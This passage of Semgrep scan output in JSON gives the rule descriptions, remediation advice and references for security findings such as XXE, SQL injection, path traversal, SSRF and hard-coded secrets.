internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The XML parser $PARSER is not securely configured. The current configuration allows for XXE attacks. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setExpandEntities(false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The XML parser $PARSER is not securely configured. The current configuration allows for XXE attacks. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setExpandEntities(false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The XML parser $PARSER is not securely configured. The current configuration allows for XXE attacks. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setExpandEntities(false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe","id":"kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe","name":"kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password","id":"java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password","name":"java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The libxml2 parser is configured to process entities. Without other options such as processing DTDs or accessing remote entities from the network, it should not pose a risk except for memory exhaustion."},"help":{"markdown":"The libxml2 parser is configured to process entities. Without other options such as processing DTDs or accessing remote entities from the network, it should not pose a risk except for memory exhaustion.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"The libxml2 parser is configured to process entities. Without other options such as processing DTDs or accessing remote entities from the network, it should not pose a risk except for memory exhaustion."},"helpUri":"https://semgrep.dev/r/cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities","id":"cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities","name":"cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint)\n - [https://docs.rs/tokio-postgres/latest/tokio_postgres/](https://docs.rs/tokio-postgres/latest/tokio_postgres/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint","id":"rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint","name":"rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected file permissions that are overly permissive (read, write, and execute). It is generally a bad practices to set overly permissive file permission such as read+write+exec for all users. If the file affected is a configuration, a binary, a script or sensitive data, it can lead to privilege escalation or information leakage. Instead, follow the principle of least privilege and give users only the permissions they need."},"help":{"markdown":"Detected file permissions that are overly permissive (read, write, and execute). It is generally a bad practices to set overly permissive file permission such as read+write+exec for all users. If the file affected is a configuration, a binary, a script or sensitive data, it can lead to privilege escalation or information leakage. Instead, follow the principle of least privilege and give users only the permissions they need.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Detected file permissions that are overly permissive (read, write, and execute). It is generally a bad practices to set overly permissive file permission such as read+write+exec for all users. If the file affected is a configuration, a binary, a script or sensitive data, it can lead to privilege escalation or information leakage. Instead, follow the principle of least privilege and give users only the permissions they need."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission","id":"java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission","name":"java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Create parameterized queries in pgx by using positional parameters (`$1`, `$2`, ...) and adding the values as additional arguments to the function call. It is also possible to create prepared statements through the `Prepare` function. This function uses the same placeholders for bound parameters."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Create parameterized queries in pgx by using positional parameters (`$1`, `$2`, ...) and adding the values as additional arguments to the function call. It is also possible to create prepared statements through the `Prepare` function. This function uses the same placeholders for bound parameters.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf)\n - [https://github.com/jackc/pgx](https://github.com/jackc/pgx)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool](https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Create parameterized queries in pgx by using positional parameters (`$1`, `$2`, ...) and adding the values as additional arguments to the function call. It is also possible to create prepared statements through the `Prepare` function. This function uses the same placeholders for bound parameters."},"helpUri":"https://semgrep.dev/r/go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf","id":"go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf","name":"go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib","id":"python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib","name":"python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If possible, it is better to rely on automatic pinning in PyTorch to avoid undefined behavior and for efficiency"},"help":{"markdown":"If possible, it is better to rely on automatic pinning in PyTorch to avoid undefined behavior and for efficiency\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.python.automatic-memory-pinning.automatic-memory-pinning)\n - [https://pytorch.org/docs/stable/data.html#memory-pinning](https://pytorch.org/docs/stable/data.html#memory-pinning)\n","text":"If possible, it is better to rely on automatic pinning in PyTorch to avoid undefined behavior and for efficiency"},"helpUri":"https://semgrep.dev/r/trailofbits.python.automatic-memory-pinning.automatic-memory-pinning","id":"trailofbits.python.automatic-memory-pinning.automatic-memory-pinning","name":"trailofbits.python.automatic-memory-pinning.automatic-memory-pinning","properties":{"precision":"very-high","tags":["CWE-676: Use of Potentially Dangerous Function","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.python.automatic-memory-pinning.automatic-memory-pinning"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Iteration over a possibly empty map `$C`. This is likely a bug or redundant code"},"help":{"markdown":"Iteration over a possibly empty map `$C`. This is likely a bug or redundant code\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.iterate-over-empty-map.iterate-over-empty-map)\n - [https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/](https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/)\n","text":"Iteration over a possibly empty map `$C`. This is likely a bug or redundant code"},"helpUri":"https://semgrep.dev/r/trailofbits.go.iterate-over-empty-map.iterate-over-empty-map","id":"trailofbits.go.iterate-over-empty-map.iterate-over-empty-map","name":"trailofbits.go.iterate-over-empty-map.iterate-over-empty-map","properties":{"precision":"very-high","tags":["CWE-665: Improper Initialization","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.iterate-over-empty-map.iterate-over-empty-map"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"help":{"markdown":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-url-host.tainted-url-host)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-url-host.tainted-url-host","id":"php.lang.security.injection.tainted-url-host.tainted-url-host","name":"php.lang.security.injection.tainted-url-host.tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-url-host.tainted-url-host"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.actix.nosql.mongodb-taint.mongodb-taint)\n - [https://docs.rs/mongodb/latest/mongodb/](https://docs.rs/mongodb/latest/mongodb/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/rust.actix.nosql.mongodb-taint.mongodb-taint","id":"rust.actix.nosql.mongodb-taint.mongodb-taint","name":"rust.actix.nosql.mongodb-taint.mongodb-taint","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.actix.nosql.mongodb-taint.mongodb-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2","id":"python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2","name":"python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Dangerous client config used, ensure SSL verification"},"help":{"markdown":"Dangerous client config used, ensure SSL verification\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.lang.security.rustls-dangerous.rustls-dangerous)\n - [https://docs.rs/rustls/latest/rustls/client/struct.DangerousClientConfig.html](https://docs.rs/rustls/latest/rustls/client/struct.DangerousClientConfig.html)\n - [https://docs.rs/rustls/latest/rustls/client/struct.ClientConfig.html#method.dangerous](https://docs.rs/rustls/latest/rustls/client/struct.ClientConfig.html#method.dangerous)\n","text":"Dangerous client config used, ensure SSL verification"},"helpUri":"https://semgrep.dev/r/rust.lang.security.rustls-dangerous.rustls-dangerous","id":"rust.lang.security.rustls-dangerous.rustls-dangerous","name":"rust.lang.security.rustls-dangerous.rustls-dangerous","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: rust.lang.security.rustls-dangerous.rustls-dangerous"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` Beware, using a custom EntityResolver will render these settings useless and you will be responsible for handeling security in the implementation of you EntityResolver. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` Beware, using a custom EntityResolver will render these settings useless and you will be responsible for handeling security in the implementation of you EntityResolver. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - 